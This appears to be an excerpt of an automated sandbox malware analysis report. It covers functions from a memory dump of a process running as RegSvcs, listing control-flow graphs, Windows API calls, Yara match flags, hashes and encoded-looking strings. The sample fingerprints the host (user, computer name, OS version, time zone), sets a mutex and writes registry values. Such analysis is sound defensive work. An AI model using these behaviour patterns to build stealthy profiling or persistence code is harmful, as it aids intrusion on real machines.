                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$InformationTimeZone
                                                      • String ID: Eastern Standard Time$Eastern Summer Time$PC$PC$XC
                                                      • API String ID: 597776487-2916830766
                                                      • Opcode ID: bccf74229683a265bf2189c4831500a881b958bb7c632b10747b3e7857b7b577
                                                      • Instruction ID: e60bc0aa405f7f4db4b80e96c1ff7416ed8d32a2361415e233af50b5757bc386
                                                      • Opcode Fuzzy Hash: bccf74229683a265bf2189c4831500a881b958bb7c632b10747b3e7857b7b577
                                                      • Instruction Fuzzy Hash: 24A12671901215ABDB10AFA7DC42AAF7BB8EF08314F14506FF901A72D1E7789E01CB99
                                                      Function 004091B0 Relevance: 6.3, APIs: 4, Instructions: 324libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2247 4091b0-40921a 2248 409220-409227 2247->2248 2249 4092f3 2247->2249 2251 409230-409247 2248->2251 2250 4092f5-4092fb 2249->2250 2252 40932c-409332 2250->2252 2253 4092fd-409309 2250->2253 2254 4093bd call 424760 2251->2254 2255 40924d-40926e call 424250 2251->2255 2257 409334-40933f 2252->2257 2258 40935b-409373 2252->2258 2259 40930b-409319 2253->2259 2260 40931f-409329 call 42a036 2253->2260 2264 4093c2-409452 call 42f02c call 42b650 GetVersionExW 2254->2264 2270 409270-40927e 2255->2270 2271 40929e-4092e2 call 425bd0 2255->2271 2265 409351-409358 call 42a036 2257->2265 2266 409341-40934f 2257->2266 2267 409375-409381 2258->2267 2268 40939d-4093bc call 4299c0 2258->2268 2259->2260 2259->2264 2260->2252 2293 4099f6-409a13 call 4299c0 2264->2293 2294 409458-409480 call 423340 call 4061f0 2264->2294 2265->2258 2266->2264 2266->2265 2274 409393-40939a call 42a036 2267->2274 2275 409383-409391 2267->2275 2278 409280-40928e 2270->2278 2279 409294-40929b call 42a036 2270->2279 2271->2250 2290 4092e4-4092e9 2271->2290 2274->2268 2275->2264 2275->2274 2278->2264 2278->2279 2279->2271 2290->2249 2292 4092eb-4092ee 2290->2292 2292->2251 2301 409482 2294->2301 2302 409484-4094a6 call 423340 call 4061f0 2294->2302 2301->2302 2307 4094a8 2302->2307 2308 4094aa-4094c3 GetModuleHandleA GetProcAddress 2302->2308 2307->2308 2309 4094f4-40951f 2308->2309 2310 4094c5-4094d4 2308->2310 2313 409550-409571 2309->2313 2314 409521-409530 2309->2314 2311 4094d6-4094e4 2310->2311 2312 4094ea-4094f1 call 42a036 2310->2312 2311->2312 2317 409a14 call 42f02c 2311->2317 2312->2309 2315 409573-409575 GetNativeSystemInfo 2313->2315 2316 409577 GetSystemInfo 2313->2316 2319 409532-409540 2314->2319 2320 409546-40954d call 42a036 2314->2320 2321 40957d-409586 2315->2321 2316->2321 2328 409a19-409a1f call 42f02c 2317->2328 2319->2317 2319->2320 2320->2313 2326 4095a4-4095a7 2321->2326 2327 409588-40958f 2321->2327 2329 409997-40999a 2326->2329 2330 4095ad-4095b6 2326->2330 2331 4099f1 2327->2331 2332 409595-40959f 2327->2332 2329->2331 2336 40999c-4099a5 2329->2336 2334 4095b8-4095c4 2330->2334 2335 4095c9-4095cc 2330->2335 2331->2293 2337 4099ec 2332->2337 2334->2337 2339 4095d2-4095d9 2335->2339 2340 409974-409976 2335->2340 2341 4099a7-4099ab 2336->2341 2342 4099cc-4099cf 2336->2342 2337->2331 2345 4096b9-40995d call 423340 call 4061f0 call 423340 call 4061f0 call 406320 call 423340 call 4061f0 call 4091b0 call 423340 call 4061f0 call 423340 call 4061f0 call 406320 call 423340 call 4061f0 call 4091b0 call 423340 call 4061f0 call 423340 call 4061f0 call 406320 call 423340 call 4061f0 call 4091b0 call 423340 call 4061f0 call 423340 call 4061f0 call 406320 call 423340 call 4061f0 call 4091b0 2339->2345 2346 4095df-409647 call 423340 call 4061f0 call 423340 call 4061f0 call 406320 2339->2346 2343 409984-409987 2340->2343 2344 409978-409982 2340->2344 2347 4099c0-4099ca 2341->2347 2348 4099ad-4099b2 2341->2348 2349 4099d1-4099db 2342->2349 2350 4099dd-4099e9 2342->2350 2343->2331 2351 409989-409995 2343->2351 2344->2337 2385 409963-40996c 2345->2385 2373 409649 2346->2373 2374 40964b-40966b call 431e8f 2346->2374 2347->2331 2348->2347 2353 4099b4-4099be 2348->2353 2349->2331 2350->2337 2351->2337 2353->2331 2373->2374 2380 4096a2-4096a4 2374->2380 2381 40966d-40967c 2374->2381 2380->2385 2386 4096aa-4096b4 2380->2386 2383 409692-40969f call 42a036 2381->2383 2384 40967e-40968c 2381->2384 2383->2380 2384->2328 2384->2383 2385->2329 2388 40996e 2385->2388 2386->2385 2388->2340
                                                      APIs
                                                      • GetVersionExW.KERNEL32(0000011C,A99F1BC9,74DF0F00), ref: 0040944A
                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004094AB
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004094B2
                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00409573
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                      • String ID:
                                                      • API String ID: 2167034304-0
                                                      • Opcode ID: c6c10183ea958272209e3d5f2c441c781a214321634d0b86db87c7ec6917dcd1
                                                      • Instruction ID: 6ce00a51f6f38b025a26ba68c37734fa0c93095d71df8d333d2419daf241495d
                                                      • Opcode Fuzzy Hash: c6c10183ea958272209e3d5f2c441c781a214321634d0b86db87c7ec6917dcd1
                                                      • Instruction Fuzzy Hash: 36C10671E001149BDB14DF68DD85B9EB775EB49314F5082AEE814AB2C2DB389E80CB99
                                                      Function 0041F4B0 Relevance: 40.1, APIs: 4, Strings: 18, Instructions: 1574registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004061F0: GetUserNameA.ADVAPI32 ref: 004075BA
                                                        • Part of subcall function 004061F0: LookupAccountNameA.ADVAPI32 ref: 00407600
                                                        • Part of subcall function 004061F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 0040760D
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0041F592
                                                      • RegCloseKey.KERNELBASE(80000002), ref: 0041F5A8
                                                      • GetUserNameA.ADVAPI32 ref: 0041F632
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041F6BD
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 0040639C
                                                        • Part of subcall function 004061F0: RegQueryValueExA.KERNELBASE(A99F1BC9,?,00000000,00000000,?,00000400,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063CA
                                                        • Part of subcall function 004061F0: RegCloseKey.KERNELBASE(A99F1BC9,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063D6
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 004064E3
                                                        • Part of subcall function 004061F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00406511
                                                        • Part of subcall function 004061F0: RegCloseKey.ADVAPI32(80000001), ref: 0040651A
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0040663C
                                                        • Part of subcall function 004061F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0040665F
                                                        • Part of subcall function 004061F0: RegCloseKey.ADVAPI32(80000002), ref: 00406668
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
                                                      • String ID: 246122658369$26467e$NNTzFs==$System$V$YSN8$YSx8$Yh 8$ZBP8$aRF8$bCN8$bX28$bYB8$cBB8$cXF8$ceP=$dRT8$diB8
                                                      • API String ID: 4106312383-3121494839
                                                      • Opcode ID: 398ddd5d0ef88610d9970279faba03fd88ce918896392dabd0b45a58d72759e2
                                                      • Instruction ID: e7717660ce22f1301982580ddf77cf5500e32532105c492a5e46472f1cedce7e
                                                      • Opcode Fuzzy Hash: 398ddd5d0ef88610d9970279faba03fd88ce918896392dabd0b45a58d72759e2
                                                      • Instruction Fuzzy Hash: BED21A71A001688BEB29DB28DE897DDBA769F82304F9081DDE408A72D7D7394FC48F55
                                                      Function 0043EC2F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 167timeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1910 43ec2f-43ec5f call 43e55d call 43e563 call 43e5c1 1917 43ec65-43ec71 call 43e569 1910->1917 1918 43ed7e-43edda call 42f049 call 446697 1910->1918 1917->1918 1923 43ec77-43ec83 call 43e595 1917->1923 1930 43ede4-43ede7 1918->1930 1931 43eddc-43ede2 1918->1931 1923->1918 1929 43ec89-43ecaa call 4381b6 GetTimeZoneInformation 1923->1929 1941 43ecb0-43ecd0 1929->1941 1942 43ed5b-43ed7d call 43e557 call 43e54b call 43e551 1929->1942 1934 43ede9-43edeb 1930->1934 1935 43eded-43ee00 call 4383e5 1930->1935 1933 43ee31-43ee43 1931->1933 1937 43ee53 1933->1937 1938 43ee45-43ee48 1933->1938 1934->1933 1947 43ee02 1935->1947 1948 43ee0c-43ee25 call 446697 1935->1948 1943 43ee58-43ee6d call 4381b6 call 4299c0 1937->1943 1944 43ee53 call 43ec2f 1937->1944 1938->1937 1945 43ee4a-43ee51 call 43e98e 1938->1945 1949 43ecd2-43ecd7 1941->1949 1950 43ecda-43ece2 1941->1950 1944->1943 1945->1943 1954 43ee03-43ee0a call 4381b6 1947->1954 1969 43ee27-43ee28 1948->1969 1970 43ee2a-43ee2b call 4381b6 1948->1970 1949->1950 1956 43ecf4-43ecf6 1950->1956 1957 43ece4-43eceb 1950->1957 1973 43ee30 1954->1973 1964 43ecf8-43ed58 call 42b650 * 4 call 432a17 call 43ee6e * 2 1956->1964 1957->1956 1963 43eced-43ecf2 1957->1963 1963->1964 1964->1942 1969->1954 1970->1973 1973->1933
                                                      APIs
                                                      • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0043EE50,?,?,00000000), ref: 0043ECA1
                                                      • _free.LIBCMT ref: 0043EC8F
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 0043EE59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID: Eastern Standard Time$Eastern Summer Time$PC$XC
                                                      • API String ID: 2155170405-467152466
                                                      • Opcode ID: f5e65e2b1882837ef4a1d0857077e9e3a8a17de7a9a0f4c2296c0059c4963ff1
                                                      • Instruction ID: 1bb49f5745b54445c7c9fd8f71209821471ce9ef43585df445a876e9104ab678
                                                      • Opcode Fuzzy Hash: f5e65e2b1882837ef4a1d0857077e9e3a8a17de7a9a0f4c2296c0059c4963ff1
                                                      • Instruction Fuzzy Hash: AC51F671901225AACB10AFA7DC06A9E7B78EF08354F10516FF414A72D1EBB89E05CB99
                                                      Function 0043080C Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1989 43080c-430841 GetFileType 1990 430847-430852 1989->1990 1991 4308f9-4308fc 1989->1991 1994 430874-430890 call 42b650 GetFileInformationByHandle 1990->1994 1995 430854-430865 call 430b82 1990->1995 1992 430925-43094d 1991->1992 1993 4308fe-430901 1991->1993 1998 43096a-43096c 1992->1998 1999 43094f-430962 PeekNamedPipe 1992->1999 1993->1992 1996 430903-430905 1993->1996 2002 430916-430923 GetLastError call 43122c 1994->2002 2010 430896-4308d8 call 430ad4 call 43097c * 3 1994->2010 2007 430912-430914 1995->2007 2008 43086b-430872 1995->2008 2001 430907-43090c call 431262 1996->2001 1996->2002 2005 43096d-43097b call 4299c0 1998->2005 1999->1998 2004 430964-430967 1999->2004 2001->2007 2002->2007 2004->1998 2007->2005 2008->1994 2023 4308dd-4308f5 call 430aa1 2010->2023 2023->1998 2026 4308f7 2023->2026 2026->2007
                                                      APIs
                                                      • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0043073E), ref: 0043082E
                                                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00430888
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043073E,?,000000FF,00000000,00000000), ref: 00430916
                                                      • __dosmaperr.LIBCMT ref: 0043091D
                                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0043095A
                                                        • Part of subcall function 00430B82: __dosmaperr.LIBCMT ref: 00430BB7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                      • String ID:
                                                      • API String ID: 1206951868-0
                                                      • Opcode ID: 749dbd5d499d1470d264ec04480df794728a01329d0d6bbc761b316cee2ec38d
                                                      • Instruction ID: a24e2a278018e4b14ecf551288e5960cc595b432ca505c8d4c5f1a48b880b77d
                                                      • Opcode Fuzzy Hash: 749dbd5d499d1470d264ec04480df794728a01329d0d6bbc761b316cee2ec38d
                                                      • Instruction Fuzzy Hash: 47414FB5900308ABDB24EFB6DC55AABBBF9EF4C710B00562EF556D3612E7349940CB24
                                                      Function 0040C6D0 Relevance: 6.0, APIs: 4, Instructions: 36sleepsynchronizationCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2440 40c6d0-40c707 Sleep CreateMutexA GetLastError 2441 40c709-40c70b 2440->2441 2442 40c71a-40c71b 2440->2442 2441->2442 2443 40c70d-40c718 GetLastError 2441->2443 2443->2442 2444 40c71c-40c723 call 42df5e 2443->2444
                                                      APIs
                                                      • Sleep.KERNELBASE(00000096), ref: 0040C6D6
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00467494), ref: 0040C6F4
                                                      • GetLastError.KERNEL32 ref: 0040C6FC
                                                      • GetLastError.KERNEL32 ref: 0040C70D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$CreateMutexSleep
                                                      • String ID:
                                                      • API String ID: 3645482037-0
                                                      • Opcode ID: 7bf80919f9e91dceb534b8465ab183818ec6dee3f15917d6dd5352bcdab66ccc
                                                      • Instruction ID: 05b33c329f834a101d1e8a6918923c0cc36b0f96f91a03b02b8734a619088f86
                                                      • Opcode Fuzzy Hash: 7bf80919f9e91dceb534b8465ab183818ec6dee3f15917d6dd5352bcdab66ccc
                                                      • Instruction Fuzzy Hash: 3BE01A30248341EBE7505B6CED8DB1F3A26D790B62F600535EA1AD75E7DB7988808A1E
                                                      Function 0043ED89 Relevance: 4.6, APIs: 3, Instructions: 83COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2447 43ed89-43edda call 446697 2450 43ede4-43ede7 2447->2450 2451 43eddc-43ede2 2447->2451 2453 43ede9-43edeb 2450->2453 2454 43eded-43ee00 call 4383e5 2450->2454 2452 43ee31-43ee43 2451->2452 2455 43ee53 2452->2455 2456 43ee45-43ee48 2452->2456 2453->2452 2463 43ee02 2454->2463 2464 43ee0c-43ee25 call 446697 2454->2464 2459 43ee58-43ee6d call 4381b6 call 4299c0 2455->2459 2460 43ee53 call 43ec2f 2455->2460 2456->2455 2461 43ee4a-43ee51 call 43e98e 2456->2461 2460->2459 2461->2459 2467 43ee03-43ee0a call 4381b6 2463->2467 2475 43ee27-43ee28 2464->2475 2476 43ee2a-43ee2b call 4381b6 2464->2476 2477 43ee30 2467->2477 2475->2467 2476->2477 2477->2452
                                                      APIs
                                                      • _free.LIBCMT ref: 0043EE59
                                                        • Part of subcall function 0043EC2F: _free.LIBCMT ref: 0043EC8F
                                                        • Part of subcall function 0043EC2F: GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0043EE50,?,?,00000000), ref: 0043ECA1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 597776487-0
                                                      • Opcode ID: 82eaa0d685ad11090675d34a3f10cb6465b1a0037b6e02a5c3dda1bb3ca6be4b
                                                      • Instruction ID: 73058ef59dd7046185ead80c26faa716bd819d22ba9cfe356290d376555c15a2
                                                      • Opcode Fuzzy Hash: 82eaa0d685ad11090675d34a3f10cb6465b1a0037b6e02a5c3dda1bb3ca6be4b
                                                      • Instruction Fuzzy Hash: 46212C7280131556CB20AB37DC4AA9B777CDF88324F11126FF465A32C2EF389D45895D
                                                      Function 004306A4 Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2479 4306a4-4306b0 2480 4306b2-4306ce call 43124f call 431262 call 42f01c 2479->2480 2481 4306cf-4306f3 call 42b650 2479->2481 2486 430711-430733 CreateFileW 2481->2486 2487 4306f5-43070f call 43124f call 431262 call 42f01c 2481->2487 2490 430743-43074a call 430782 2486->2490 2491 430735-430739 call 43080c 2486->2491 2511 43077d-430781 2487->2511 2501 43074b-43074d 2490->2501 2500 43073e-430741 2491->2500 2500->2501 2503 43076f-430772 2501->2503 2504 43074f-43076c call 42b650 2501->2504 2507 430774-430775 CloseHandle 2503->2507 2508 43077b 2503->2508 2504->2503 2507->2508 2508->2511
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 41254b0cab8666a23a93eb46c529210e015b8c12debe9a9a25af724ae25d77a7
                                                      • Instruction ID: 61d7ac309e15a0dd2b1112fe8d0e6e541833381e3abde1be50b0bf788e8b099f
                                                      • Opcode Fuzzy Hash: 41254b0cab8666a23a93eb46c529210e015b8c12debe9a9a25af724ae25d77a7
                                                      • Instruction Fuzzy Hash: A3214B31500208BBEB107F699C42B9F37299F45778F204326F8347B2D1C778AE0596A9
                                                      Function 0043097C Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2512 43097c-430992 2513 4309a2-4309b2 FileTimeToSystemTime 2512->2513 2514 430994-430998 2512->2514 2516 4309f2-4309f5 2513->2516 2517 4309b4-4309c6 SystemTimeToTzSpecificLocalTime 2513->2517 2514->2513 2515 43099a-4309a0 2514->2515 2519 4309f7-430a02 call 4299c0 2515->2519 2516->2519 2517->2516 2518 4309c8-4309e8 call 430a03 2517->2518 2522 4309ed-4309f0 2518->2522 2522->2519
                                                      APIs
                                                      • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,004308B3,?,?,00000000,00000000), ref: 004309AA
                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,004308B3,?,?,00000000,00000000), ref: 004309BE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Time$System$FileLocalSpecific
                                                      • String ID:
                                                      • API String ID: 1707611234-0
                                                      • Opcode ID: 083b45ba5e4f5ba8717be5abdb87d3da99cbf17a84dc3f54d2d5a640384f059b
                                                      • Instruction ID: e8b1224c30455b4454d1d7bc614790d12a5377c451a15f0158bb94fcca1467ba
                                                      • Opcode Fuzzy Hash: 083b45ba5e4f5ba8717be5abdb87d3da99cbf17a84dc3f54d2d5a640384f059b
                                                      • Instruction Fuzzy Hash: 77111CB290020CABDB00DF95C945BDFB7BCAF4C311F505367E516E6181EB34EA458B65
                                                      Function 00420DB0 Relevance: 3.0, APIs: 2, Instructions: 23sleepthreadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040C6D0: Sleep.KERNELBASE(00000096), ref: 0040C6D6
                                                        • Part of subcall function 0040C6D0: CreateMutexA.KERNELBASE(00000000,00000000,00467494), ref: 0040C6F4
                                                        • Part of subcall function 0040C6D0: GetLastError.KERNEL32 ref: 0040C6FC
                                                        • Part of subcall function 0040C6D0: GetLastError.KERNEL32 ref: 0040C70D
                                                        • Part of subcall function 0041F4B0: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0041F592
                                                        • Part of subcall function 0041F4B0: RegCloseKey.KERNELBASE(80000002), ref: 0041F5A8
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 004067BD
                                                        • Part of subcall function 004061F0: RegQueryInfoKeyW.ADVAPI32 ref: 00406894
                                                      • CreateThread.KERNELBASE ref: 00420D90
                                                      • Sleep.KERNELBASE(00007530), ref: 00420DA5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateErrorLastOpenSleep$CloseInfoMutexQueryThread
                                                      • String ID:
                                                      • API String ID: 2150463253-0
                                                      • Opcode ID: 9c5c56c67b97ed114369958bf5c8b56eb1ac444260a1130bafd3c3612b7511a9
                                                      • Instruction ID: 3b1eac4e0a60303c1dff9b400d2025ec4af11ec8799795f63c25612d63d1b09b
                                                      • Opcode Fuzzy Hash: 9c5c56c67b97ed114369958bf5c8b56eb1ac444260a1130bafd3c3612b7511a9
                                                      • Instruction Fuzzy Hash: C4E086317D4324A7E22037E26C07F9D39455B04F56FA40227B7092A0E39DDC358045AF
                                                      Function 0040B250 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2581 40b250-40b2dc GetComputerNameExW 2582 40b2e0-40b2e9 2581->2582 2582->2582 2583 40b2eb-40b2f2 2582->2583 2584 40b2f4-40b323 call 42b0d0 2583->2584 2585 40b325-40b32b 2583->2585 2594 40b395-40b3f7 call 423010 2584->2594 2587 40b331-40b33c 2585->2587 2588 40b4ab call 4026a0 2585->2588 2591 40b345-40b34c 2587->2591 2592 40b33e-40b343 2587->2592 2593 40b4b0-40b4b5 call 42f02c 2588->2593 2595 40b34f-40b38f call 4256e0 call 42b0d0 2591->2595 2592->2595 2603 40b451-40b45a 2594->2603 2604 40b3f9 2594->2604 2595->2594 2607 40b45c-40b471 2603->2607 2608 40b48d-40b4aa call 4299c0 2603->2608 2606 40b400-40b41d 2604->2606 2615 40b421-40b44f 2606->2615 2616 40b41f 2606->2616 2611 40b483-40b48a call 42a036 2607->2611 2612 40b473-40b481 2607->2612 2611->2608 2612->2593 2612->2611 2615->2603 2615->2606 2616->2615
                                                      APIs
                                                      • GetComputerNameExW.KERNEL32(00000002,?,?,A99F1BC9,74DF0F00), ref: 0040B2A6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID:
                                                      • API String ID: 3545744682-0
                                                      • Opcode ID: 8935a04053b771ff7606a8fd0103d9a7a7e9d0e16d527a16f0351c7dd7226f59
                                                      • Instruction ID: 050d900616f6a6a152b7b8354c128e67105c74911c083c46fea7e7db7a4b0cf1
                                                      • Opcode Fuzzy Hash: 8935a04053b771ff7606a8fd0103d9a7a7e9d0e16d527a16f0351c7dd7226f59
                                                      • Instruction Fuzzy Hash: 5051A471A012289BCB20DF64DC887DDB7B4EF58314F5006EAD819A7291DB786F84CF99
                                                      Function 00430632 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                                                      • Instruction ID: 35455fcf37491ee6bd69110a5b47a0bdc70de66d87c835a3063b810ddd23e912
                                                      • Opcode Fuzzy Hash: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                                                      • Instruction Fuzzy Hash: E101AC71D04218AEDF01AFA99C027DE7FF49F88324F14416BF818E61D5EA748A60C78C
                                                      Function 00420CF0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 0040639C
                                                        • Part of subcall function 004061F0: RegQueryValueExA.KERNELBASE(A99F1BC9,?,00000000,00000000,?,00000400,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063CA
                                                        • Part of subcall function 004061F0: RegCloseKey.KERNELBASE(A99F1BC9,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063D6
                                                      • Sleep.KERNELBASE ref: 00420D75
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQuerySleepValue
                                                      • String ID:
                                                      • API String ID: 4119054056-0
                                                      • Opcode ID: 16fb6ca28f44bc769542cee678ba815e9a8f2471971720bd61ea7338c613dabc
                                                      • Instruction ID: bc7465baf16aac579654f4ee726a40ebde765d5b47a6fba71537ca3684cb7cf5
                                                      • Opcode Fuzzy Hash: 16fb6ca28f44bc769542cee678ba815e9a8f2471971720bd61ea7338c613dabc
                                                      • Instruction Fuzzy Hash: B3F0F971B00214A7C700BBADDD0774D7B74E706B24F91036EE811672D3EA791A0447DB

                                                      Non-executed Functions

                                                      Function 004293ED Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004293F3
                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00429401
                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00429412
                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00429423
                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00429434
                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00429445
